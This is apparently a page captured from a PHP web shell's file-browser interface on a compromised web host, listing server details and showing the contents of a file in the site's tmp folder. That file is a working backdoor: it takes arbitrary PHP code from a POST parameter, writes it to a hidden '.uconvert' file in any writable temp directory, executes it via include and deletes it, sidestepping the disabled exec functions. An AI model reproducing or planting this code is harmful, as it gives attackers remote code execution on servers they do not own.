HEX
Server: Apache/2.4.29 (Ubuntu) mod_fcgid/2.3.9
System: Linux f5-php5-01 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64
User: (1332)
PHP: 5.3.29
Disabled: eval,exec,passthru,shell_exec,system,proc_open,popen,show_source
Upload Files
File: /home/5_365/flickinger-bau.de/tmp/x39x8aLtYZo0e9wV8cS4
<?php $dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode($_POST["zs"]);foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.uconvert";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!"); ?>